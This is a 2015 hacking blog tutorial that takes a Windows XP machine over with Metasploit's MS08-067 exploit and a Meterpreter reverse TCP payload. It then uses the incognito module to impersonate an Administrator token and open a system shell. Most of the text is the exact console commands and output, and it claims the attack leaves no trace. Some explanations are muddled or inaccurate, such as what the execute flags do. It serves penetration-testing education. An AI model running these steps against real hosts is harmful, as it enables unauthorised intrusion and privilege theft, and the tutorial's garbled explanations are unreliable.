Home 0P3N Blog Metasploit: Incognito Attack
Ready to Start Your Career?
Create Free Account
By: Multi Thinker
July 14, 2015

Metasploit: Incognito Attack

By: Multi Thinker
July 14, 2015
By: Multi Thinker
July 14, 2015
playing-with-light-cybraryHi there,This is Metasploit part 1. In a recent article, we learned about the basics and a little bit of configuration. Here, we'll be a little more advanced.

Meterpreter

What's meterpreter? Meterpreter is a DLL injector, mostly used to hijack windows security.  A list of commands can let us overtake security of Windows and make changes to/access it.
Points to note:
  • Meterpreter works with TLS
  • Meterpreter can edit Windows features/events/scripts/shell , e.g
  • Meterpreter can us Listener to receive logs/events about victim as backdoor etc

Incognito Attack

As you might imagine, this attack vector hits anonymously (it leaves no signs of itself) and can be used to steal a session.

Useful information: Windows login / administrator rights - let's assume we have Windows XP service pack 2 installed here. We're on the same LAN or we have the IP (in recent article we learned about how to start msfcli / msfconsole / metasploit). Let's assume you've now opened that. Set the target by typing RHOST and search the exploit named "ms08_067_netapi". For using exploits, we know we need to type:use exploit (full path can be found by typing search)Next, type:
  msf> use exploit/windows/smb/ms08_067_netapi
It will show you that you're using this exploit:
  msf exploit(ms08_067_netapi) >
Now, you need to see the options and set RHOST, or the configuration we talked about in a recent article:
 msf exploit(ms08_067_netapi) > set RHOST xx.xx.xx.xx
It will become:
 RHOST => xx.xx.xx.xx ( this means our RHOST is setuped )
 Let's Use PayloadsPayloads: Payloads are additional scripts that stand-alone and work with a sequence to take over the victim.Buit-in has its own default payloads. We can even use out own.Using payloads, let's use meterpreter reverse TCP:
 msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
Hit enter and this will appear, meaning your exploit is set up, too:
 PAYLOAD => windows/meterpreter/reverse_tcp
Next, set up LHOST (local host for using payloads and creating sessions for attack. Of course, we're LHOST and we will give our IP)
 msf exploit(ms08_067_netapi) > set LHOST xx.xx.xx.xx
 LHOST = > xx.xx.xx.xx
The configurations are complete; let's see the targets/options and what we can do further:
msf exploit(ms08_067_netapi) > show targetsExploit targets:    Id  Name                                     --  ----                        0   Automatic Targeting                               1   Windows 2000 Universal                           2   Windows XP SP0/SP1 Universal    3   Windows XP SP2 English (NX)    4   Windows XP SP3 English (NX)    5   Windows 2003 SP0 Universal     6   Windows 2003 SP1 English (NO NX)    7   Windows 2003 SP1 English (NX)    8   Windows 2003 SP2 English (NO NX)    9   Windows 2003 SP2 English (NX)    10  Windows XP SP2 Arabic (NX)    11  Windows XP SP2 Chinese - Traditional / Taiwan (NX)
 We have to choose the kind of OS we need to exploit/attack. We can use NMAP / ZENMAP to learn that information:
      msf exploit(ms08_067_netapi) > set TARGET 8
 target => 8
Let's exploit:
 msf exploit(ms08_067_netapi) > exploit  [*] Handler binding to LHOST 0.0.0.0  [*] Started reverse handler  [*] Triggering the vulnerability...  [*] Transmitting intermediate stager for over-sized stage...(191 bytes)  [*] Sending stage (2650 bytes)  [*] Sleeping before handling stage...  [*] Uploading DLL (75787 bytes)...  [*] Upload completed.  [*] Meterpreter session 1 opened (xx.xx.xx.xx:xx -> xx.xx.xx.xx:xx)  meterpreter >
Choose incognito
  meterpreter > use incognito
See more options for what we can do in incognito using help:
  meterpreter > help  Command              Description                                               -------              -----------                                               add_group_user       Attempt to add a user to a global group with all tokens   add_localgroup_user  Attempt to add a user to a local group with all tokens    add_user             Attempt to add a user with all tokens                     impersonate_token    Impersonate specified token                               list_tokens          List tokens available under current user context          snarf_hashes         -----------
We have to see session/tokens to access our victim. To list those tokens, type:
  meterpreter > list_token -u  Delegation Tokens Available  ========================================  NT AUTHORITYLOCAL SERVICE  NT AUTHORITYNETWORK SERVICE  NT AUTHORITYSYSTEM  ThinkerAdministrator  Impersonation Tokens Available  ========================================  NT AUTHORITYANONYMOUS LOGON
 We got the administrator listed. Let's dump it. For dumping, we need to type command with our Victim Target name using slashes:
    meterpreter >  impersonate_token  Thinker//Administrator  [+] Delegation token available  [+] Successfully impersonated user ThinkerAdministrator    let see what we got here,   meterpreter > getuid  Server username: ThinkerAdministrator
 The last step: we need to start Windows cmd. For that, type "execute -f cmd.exe -i -t"where -f is forcing meterpreter to use cmd, where -i is listing victims and -t is impersonating from it.With shell, we can exploit meterpreter and have full access:
  meterpreter > shell   Process 2804 created.  Channel 1 created.  Microsoft Windows XP [Version 5.1.2600]  (C) Copyright 1985-2001 Microsoft Corp.  C:WINDOWSsystem32> whoami  whoami  Thinkeradministrator  C:WINDOWSsystem32>
 Voila! We're now in the Windows system and have full access of it.--Multi Thinker
Request Demo

Build your Cybersecurity or IT Career

Accelerate in your role, earn new certifications, and develop cutting-edge skills using the fastest growing catalog in the industry